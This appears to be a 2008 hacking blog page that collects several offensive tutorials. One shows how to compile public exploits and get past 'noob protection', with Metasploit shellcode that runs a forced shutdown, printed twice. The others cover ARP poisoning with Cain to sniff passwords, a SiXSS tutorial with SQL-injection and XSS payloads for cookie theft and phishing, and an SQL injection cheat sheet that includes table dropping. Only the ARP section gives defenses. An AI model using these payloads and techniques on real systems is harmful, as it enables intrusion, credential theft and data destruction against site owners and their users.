Using exploits. (Includes n00b protection)

###############
# Yes, Yes nooby, stfu if you think you are better than this level, everyone went thro this stage, and some had to learn this tha hard #way by getting flamed on forums. this should spare them that flame :)

I will discuss ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or scramble a simple statement so people immediatly know that it shouldnt be that way. This protects against skiddies and noobs from getting and running the exploit. I will show you how to compile exploits with Dev C++ and run perl and php scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options

DarkMindZ

in the main window will be a checkbox that says "Add the following commands when calling the compiler" type this in the box -lwsock32

DarkMindZ



press ok and compile again.
----

Using Shellcodes
you can generate shellcodes for metasploits projects with ease. here is one i made for this post




/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x31xc9x83xe9xdcxd9xeexd9x74x24xf4x5bx81x73x13xec"
"x94x52x85x83xebxfcxe2xf4x10x7cx16x85xecx94xd9xc0"
"xd0x1fx2ex80x94x95xbdx0exa3x8cxd9xdaxccx95xb9xcc"
"x67xa0xd9x84x02xa5x92x1cx40x10x92xf1xebx55x98x88"
"xedx56xb9x71xd7xc0x76x81x99x71xd9xdaxc8x95xb9xe3"
"x67x98x19x0exb3x88x53x6ex67x88xd9x84x07x1dx0exa1"
"xe8x57x63x45x88x1fx12xb5x69x54x2ax89x67xd4x5ex0e"
"x9cx88xffx0ex84x9cxb9x8cx67x14xe2x85xecx94xd9xed"
"xd0xcbx63x73x8cxc2xdbx7dx6fx54x29xd5x84x64xd8x81"
"xb3xfcxcax7bx66x9ax05x7ax0bxe7x3axf0x98xf0x3dxf2"
"x82xb4x7fxe3xccxb9x21x85";






you can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS First, select the payload you wish to use.

DarkMindZ

then type the command you want it to execute, then press "generate payload"

DarkMindZ


PostPosted: Fri Dec 28, 2007 4:46 pm Reply with quoteBack to top
I will discuss ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or scramble a simple statement so people immediatly know that it shouldnt be that way. This protects against skiddies and noobs from getting and running the exploit. I will show you how to compile exploits with Dev C++ and run perl and php scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options

Image

in the main window will be a checkbox that says "Add the following commands when calling the compiler" type this in the box -lwsock32

Image

press ok and compile again.
----

Using Shellcodes
you can generate shellcodes for metasploits projects with ease. here is one i made for this post
Code:
/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x31xc9x83xe9xdcxd9xeexd9x74x24xf4x5bx81x73x13xec"
"x94x52x85x83xebxfcxe2xf4x10x7cx16x85xecx94xd9xc0"
"xd0x1fx2ex80x94x95xbdx0exa3x8cxd9xdaxccx95xb9xcc"
"x67xa0xd9x84x02xa5x92x1cx40x10x92xf1xebx55x98x88"
"xedx56xb9x71xd7xc0x76x81x99x71xd9xdaxc8x95xb9xe3"
"x67x98x19x0exb3x88x53x6ex67x88xd9x84x07x1dx0exa1"
"xe8x57x63x45x88x1fx12xb5x69x54x2ax89x67xd4x5ex0e"
"x9cx88xffx0ex84x9cxb9x8cx67x14xe2x85xecx94xd9xed"
"xd0xcbx63x73x8cxc2xdbx7dx6fx54x29xd5x84x64xd8x81"
"xb3xfcxcax7bx66x9ax05x7ax0bxe7x3axf0x98xf0x3dxf2"
"x82xb4x7fxe3xccxb9x21x85";


you can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS First, select the payload you wish to use.

Image

then type the command you want it to execute, then press "generate payload"

Image

your shellcode should be printed out nicely for you.
- - -

Perl Exploits
If your using windows install this msi package. Lets use an example perl script from milw0rm. http://www.milw0rm.com/exploits/3661

save that exploit to your c: drive as a file called "3661.pl". This exploit justs generates an HTML file exploit, "exploit.html". Its that simple. But some exploits require you to have SSL installed. so you can grab that for windows at the top of this post with the other downloads. Some exploits may require you to pass "arguments" to the application, like this epxloit.

uh oh, noob protection?




syntax error at C:2552.pl line 47, near "print"
Execution of C:2552.pl aborted due to compilation errors.






well instantly i see the end of the line $vul=" is on has no ";" at the end of it. Put that in there so it looks like this




$host=$ARGV[0];
$path=$ARGV[1];
$vul="phpbb_security.php?phpbb_root_path=";





now save it and try again. YAY




C:>2552.pl

################################################## ########################
# #
# phpBB Security <= 1.0.1 Remote File Include Vulnerability #
# Bug found By : Ashiyane Corporation #
# Email: nima salehi nima[at]ashiyane.ir #
# Web Site : www.Ashiyane.ir #
# #
################################################## ########################

Usage: Ashiyane.pl [host] [path]




EX : Ashiyane.pl www.victim.com /path/

by r3dr0ot | 2008/02/26 15:02 | →Penetration Test | 트랙백

ARP Poisoning and Cain

Right then, it's time to get down to work! Today's post will focus on a useful little attack vector called ARP
Poisoning
(Or ARP Cache Poisoning for the sticklers).

What is ARP?

The Address Resolution Protocol (ARP for short) is how network devices associate MAC addresses with I.P addresses so
that devices on the local network can find each other. ARP is basically a form of networking roll call.

ARP, a very simple protocol, consists of merely four basic message types:

1. An ARP Request. Computer A asks the network, "Who has this IP address?"
2. An ARP Reply. Computer B tells Computer A, "I have that IP. My MAC address is [whatever it is]."
3. A Reverse ARP Request (RARP). Same concept as ARP Request, but Computer A asks, "Who has this MAC
address?"
4. A RARP Reply. Computer B tells Computer A,"I have that MAC. My IP address is [whatever it is]"

All network devices have an ARP table, a short-term memory of all the IP addresses and MAC addresses the device has
already matched together. The ARP table ensures that the device doesn't have to repeat ARP Requests for devices it
has already communicated with.

Here's a basic example of a typical ARP process:


I want to print this article for a friend who's downstairs in the kitchen. In the kitchen there is a networked
printer with the i.p of 192.168.0.6. My computer has the i.p of 192.168.0.3.

So my computer broadcasts an ARP request to the entire network asking who has the i.p 192.168.0.6? All the computers
that don't have this i.p simply ignore this request but the printer who has the correct i.p wakes up and sends an
ARP reply saying "Hey! I'm 192.168.0.6 and my MAC address is FF:FF:FF:FF:FF:FF!".

Now my computer knows the printer's MAC address, it sends the file to be printed to the correct printer and
associates the printer's MAC address with the printer's i.p address in it's ARP table.

The one problem with ARP is that it's very trusting so it assumes that the computer who gives the i.p address and
the MAC address is the real computer. There's no verification. This was probably done to simplify networking at the
start but as you're about to see, it leave some very big security holes...


The Attack:

Since I'm using windows xp (windows haters don't kill me, I use linux on a regular basis), I'm going to
use a very clever program called Cain. You can download this program from www.oxid.it free of charge!

Some people use this tool and have no idea how it actually works and that's why I wrote this article, so you at
least know what it's doing!

So I'll fire up Cain:

(IMG:http://img155.imageshack.us/img155/3742/cainsd8.jpg)


(If this is too small then I've hosted it on imageshack at http://img155.imageshack.us/my.php?image=cainsd8.jpg)

Right so as you can (hopefully) see, I've fired up Cain, I've started up the sniffer (the little network card
icon at the top left) and I've started ARP (little radioactive symbol next to the sniffer).

Of course before you can do that, you need to scan your hosts, so click on the little hosts tab and you'll see
something like this:

(IMG:http://img138.imageshack.us/img138/8838/hostsfs1.jpg)


(If it's too small then go to imageshack at http://img138.imageshack.us/my.php?image=hostsfs1.jpg)

So, as you can see, the hosts list is empty! How to solve this? Right click and you'll see an option "Scan Mac
Addresses" . Select that and you'll see a form


(like http://img147.imageshack.us/my.php?image=scangn7.jpg).

Use the default of "Scan all hosts in my subnet" and you'll see a list of computer names, i.p addresses
and MAC addresses come up.

From there, go back into the ARP tab and at the top you should see a little plus sign click on it to get something like


(IMG:http://img218.imageshack.us/img218/9823/arpgt2.jpg)




I've taken my hack lab's router i.p and then on the right, all the i.p's that it associates!

Be careful with this as if you take the router, you must be able to forward ports otherwise the computers can't
communicated and then in a couple of clicks you've taken down their internet access and their network access.
It's pretty overt.

Anyway, back on topic.

Cain starts poisoning and you get something like: (http://img144.imageshack.us/my.php?image=poisonsm5.jpg) and yeah for
some reason it's overlapping. No big deal.


(IMG:http://img144.imageshack.us/img144/403/poisonsm5.jpg)


As you see it says that it's full routing. If you get half routing at first, that's normal.

Now, this is where it gets exciting!

Cain has yet another lovely feature, in which it picks up passwords from the traffic going through. So I'm going to
go to a email site and type in some made up credentials and we'll see what Cain picks up on.

So basically I created an account for this article and am going to log into that account on another computer.

(IMG:http://img72.imageshack.us/img72/2695/successpg8.jpg)



As you can see, there are two passwords that have come up! Of course the accounts aren't real but if they were I
would have full access.

This also works with FTP accounts, pop3 accounts, well just take a look in the options!

It shows how dangerous a simple attack can be. As it doesn't affect just the network, it can affect all of your
internet details too.


The Defense:
Scared? Good, Now Calm Down!

This is scary stuff. ARP Cache Poisoning is trivial to exploit yet it can result in very significant network compromise.
However, before you jump to Defcon-7, notice the major mitigating factor: only local attackers can exploit ARP's
insecurities. A hacker would need either physical access to your network, or control of a machine on your local network,
in order to deliver an ARP Cache Poisoning attack. ARP's insecurities can't be exploited remotely.

That said, hackers have been known to gain local access to networks. Good network administrators should be aware of ARP
Cache Poisoning techniques.

Since ARP Cache Poisoning results from a lack of security in a protocol that is required for TCP/IP networking to
function, you can't fix it. But you can help prevent ARP attacks using the following techniques.

For Small Networks

If you manage a small network, you might try using static IP addresses and static ARP tables. Using CLI commands, such
as "ipconfig /all" in Windows or "ifconfig" in 'NIX, you can learn the IP address and MAC
address of every device in your network. Then using the "arp -s" command, you can add static ARP entries for
all your known devices. "Static" means unchanging; this prevents hackers from adding spoofed ARP entries for
devices in your network. You can even create a login script that would add these static entries to your PCs as they
boot.

However, static ARP entries are hard to maintain; impossible in large networks. That's because every device you add
to your network has to be manually added to your ARP script or entered into each machine's ARP table. But if you
manage fewer than two dozen devices, this technique might work for you.

For Large Networks

If you manage a large network, research your network switch's "Port Security" features. One "Port
Security" feature lets you force your switch to allow only one MAC address for each physical port on the switch.
This feature prevents hackers from changing the MAC address of their machine or from trying to map more than one MAC
address to their machine. It can often help prevent ARP-based Man-in-the-Middle attacks.

For All Networks

Your best defense is understanding ARP Poisoning and monitoring for it. I'd highly recommend deploying an ARP
monitoring tool, such as ARPwatch, to alert you when unusual ARP communication occurs. This kind of vigilance is still
the greatest weapon against all kinds of attack -- for, as Robert Louis Stevenson wrote, "The cruelest lies are
often told in silence."

I'd like to thank http://www.watchguard.com/ for their defense section as I felt this was well written and it would
be redundant for me to write another section.

The introduction and the attack section was written by me.

- sas01

by r3dr0ot | 2008/02/20 18:00 | 트랙백

SiXSS attack tutorial

SiXSS attack tutorial

Author: HecTor

//Here can be some grammar mistakes, because English isnt my native language. Sorry, and tell me if you find a mistake
;)

[First]
This article tells about particularities of the use of such attacks as SQL Injection and XSS (Cross Site Scripting) in
one attack - SiXSS.
For who is written this article? The Article is for beginner in this area, but expects that there is some
knowledgeâ??s beside reader. That is to say, at least general notion about SQL-injection and XSS.
Well, do not forget about penal codes and criminal responsibility for your own actions. The author of the article has
not responsibility for possible caused damage.

[How to]
Adn what is a SiXSS? I already wrote above, this - joint use two types of the attacks. There can be a question: but why
this is necessary? There is SQL-inj, there is XSS, and there are dont need to be combinate!

But... Many people faced with such thing: fluent searching for of the criticality on web-put does not bring the success.
XSS is not seen, minimum of scriptsâ?¦ But! We have found the vulnerable request, removing inquired page
from database:

[vuln_url]
http://site.net/article.php?article=8
[/vuln_url]

Test on SQL injection vulnerability. We shall try so:

[vuln_url]
http://site.net/article.php?article=8+AND+1=2/*
[/vuln_url]

There is nothing.

[vuln_url]
http://site.net/article.php?article=8+AND+1=1/*
[/vuln_url]

Itâ??s executed. Its mean â?? this is SQL-injection. Next, hacker tries to pull out necessary given from
database. However, what we shall do if no concrete information comparatively database, or database forbids the access to
files? Time goes...
Right here, comes SiXSS.

[SQL and XSS]
The SQL language, have a UNION operator, which can combinate two requests. I'll try to explain:

[vuln_url]
http://site.net/news.php?id=1+union+select+1,DATABASE(),3/*
[/vuln_url]

The request select the news with identifier 1, and in this request to select information about this database.
However, UNION SELECT enables to show in browser window arbitrarily text. Due to this, just, we and can successfully use
SiXSS. In the beginning, certainly, it is necessary to pick up quantity water, since the quantity of fields taken from a
database, should be equal to quantity of taken fields after UNION.

[vuln_url]
http://site.net/article.php?article=8+union+select+1,2,3/*
[/vuln_url]

This can be us to help if UNION is not filtered. We shall introduce javascript through SQL inj. After all, he is
displayed in browser, due to particularities UNION SELECT.

[vuln_url]
http://site.net/article.php?article=8+union+select+<script>alert("Vulnerability");</script>/*
[/vuln_url]

Here is and alert-window with message â??Vulnerabilityâ??. If we will work with this script, we will get
passive XSS criticality - dispatch cookies passed on such reference of the person to us, on sniffer. This was to be
proved - now we can work with this vulnerability, like as with a usual XSS.

[Troubles]
Though, all not so simply, this is â??the ideal variantâ?? of â??ideal vulnerabilityâ??. To
example, what we going to do, if server have a directive "magic_quotes_ gpc", which filters the quotation
marks? This is not a trouble. To avoid this filtering, possible to use coding in HEX, with accompaniment 0x, or ASCII
encoding. You can use the some programs, or special script, or facility same MySQL Database or other (the function
char() and hex()).

So, we shall consider that we coded in HEX expression «<script>alert (" Vulnerability
");</script>». Let's try to substitute this value in vulnerable inquiry:

[vuln_url]
http://site.net/article.php?article=8+union+select+0x3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E
[/vuln_url]

So, we are bypassing the magic_quotes. Now we shall speak â??bad look of URLâ??. They same, as well as at
usual passive XSS: the person can not pass to the link (long and not clear URL), or at the person performance javascript
is switched-off. We shall begin.

There is a set of different ways to force a victim to pass under the "poisonous" link without suspicion. I
shall tell about one of such ways.

If you have read some articles about XSS, and use this vulnerability in practice, you must have a notion about that: how
to use passive XSS in POST-request. I try to explain. To example, given are sent vulnerable reqest by POST-method.
Example: HTML-form:

[html code]
<HTML>
<BODY ONLOAD="send.submit();"
<FORM NAME=send ACTION=xss.php METHOD=POST>
<INPUT TYPE=hidden NAME=alert VALUE="<script>alert('XSS');</script>">
</FORM>
</BODY>
</HTML>
[/html code]

And here is script, with name xss.php:

[php code]
<?
echo $_POST['alert']
?>
[/php code]

So, if we shall transmit already known javascript - alert will appear, but in an address line the URL of a vulnerable
script donâ??t have any GET parameters. That is, a little suspicious.

The poisonous link palm off so: write a script which sends reqest to a vulnerable script, and fill it on any host. Then,
give the link on such script to victim. And victim, nothing not suspecting, passes on the link. Data, POST are sent
inquiry to a vulnerable script. Result - XSS has gone right!

Thus, it is possible a foreign script and to redirect a victim on the poisonous reference(link) with ours SiXSS.
Example: such script on PHP, will be redirect browser to the other page:

[php code]
<?
header("Location: link")
?>
[/php code]

Its fine, one more problem behind. But we will return to the JS switch off.

I have read about one interesting method. Using UNION SELECT, we can bring on page not only javascript, but also - HTML.
So, it is possible to fake the page with input of login and password with sending to our script, which will write all
data to a file. It is simple fishing. Sounds good, yes?

[Hacked, yeah =)]
Anything "supernew" in article is not present, all the same SQL-inj and XSS. I hope, you have gathered
something for yourself from it. If you find any thematic mistakes â?? tell me about this.

by r3dr0ot | 2008/02/19 08:31 | →Penetration Test | 트랙백(2)

Und3r h4ckin9 F0rum lol

                                                              http://72.20.10.53/affiliates.dmz

by r3dr0ot | 2008/02/18 23:34 | ▣r3dr0ot's Profile▣ | 트랙백

SQL Quick Reference Revised

SQL Quick Reference.

Symbols and Words:
' starts new query

OR: tells it to do what the query is suppose to do OR what you tell it.

AND: Will only execute if both conditions are true. Might wonder why you would
actually want there end to have to evaluate to being true as well. But there is a reason.
Which will be in next article.

backslash' :need it to break up quotes when the admin has programed in double quotes

/* :comment out rest of query a lot like --. I find it works in combination with
the backslash'

; :end query


' having 1=1-- : If your lucky it will give you an error containing a column name.

It should be the first it comes across. You get the error because the statement

should be group by a column HAVING something, that something being a value of some sort letter number whatever. Seeing
as

your missing the group by it will give you an error. If you get a column name next you would want ' group by
ColumYouGot

having 1=1--. That should give you the next column. Next statement would be ' group by colum1,colum2 having 1=1--.

You can just keep using that syntax until you dont get an error, that would mean you have all the columns.

What can you do with all that crap? You would insert it into the table useing

' insert into tablename values(blah,blah,blah,blah); Your going to need the right

type of data for each of those columns most of which you can tell by the name of it.

But most of the time there will be at least one you need to check. To do this you

would do ' union select sum(column) from table name--. This will give you an error in

converting the value of that column type into an integer. So once ya have all that

insert the values you want yay.
----------------------------------------------------------------------------------------------------

' or 1=1: most basic injection. Will work maybe 1 in hundred times. It will search for

the first value that equates to true. In other words the first value that exist.
----------------------------------------------------------------------------------------------------


backslash' or 1=1/* does the same thing but is used when there doubleing up quotes. This

escapes you from the quotes the /* comments out the rest of the query.
----------------------------------------------------------------------------------------------------

' ORDER BY 1--: Used to see how many columns are in a givin table. If you dont get

an error returned then keep increasing the number by one until you do get an

error. The number you used right b4 the one you got an error is the number of columns.

EX: order by 9 gives no error. You then try order by 10 which gives you an error.

the number of of columns is 9. Also use common sense. If you think its a huge database

dont start at 1 and increase by one.
-----------------------------------------------------------------------------------------------------

' drop tablename-- This is used to delete and entire table. Never used it. Dont

be a dick.
-----------------------------------------------------------------------------------------------------
'union select 1,2,3 from tablename--: with any luck will give you the value of one or more of

the columns within the table. Has worked a few times.
-------------------------------------------------------------------------------------------------------

' union select min(column) from tablename WHERE value > letter:

example: union select min(passwd) FROM Passwords WHERE value > a

What it tries to do is select passwd where the minimum value is greater than

A and convert it to an integer. The error would produce something like: error

converting varchar value ants into column type integer. Have had this work once

but thats about it. Rest of the time it just returned error with just that single

letter.
---------------------------------------------------------------------------------------------------------
Well thats it for this one was supposed to be a quick reference. Will get more into
it into these commands and what you can do with them in next article along with
more advanced commands. Understand that these are in a forms based format.

by r3dr0ot | 2008/02/18 20:17 | →SQL injection | 트랙백(13)

◀ 이전 페이지          다음 페이지 ▶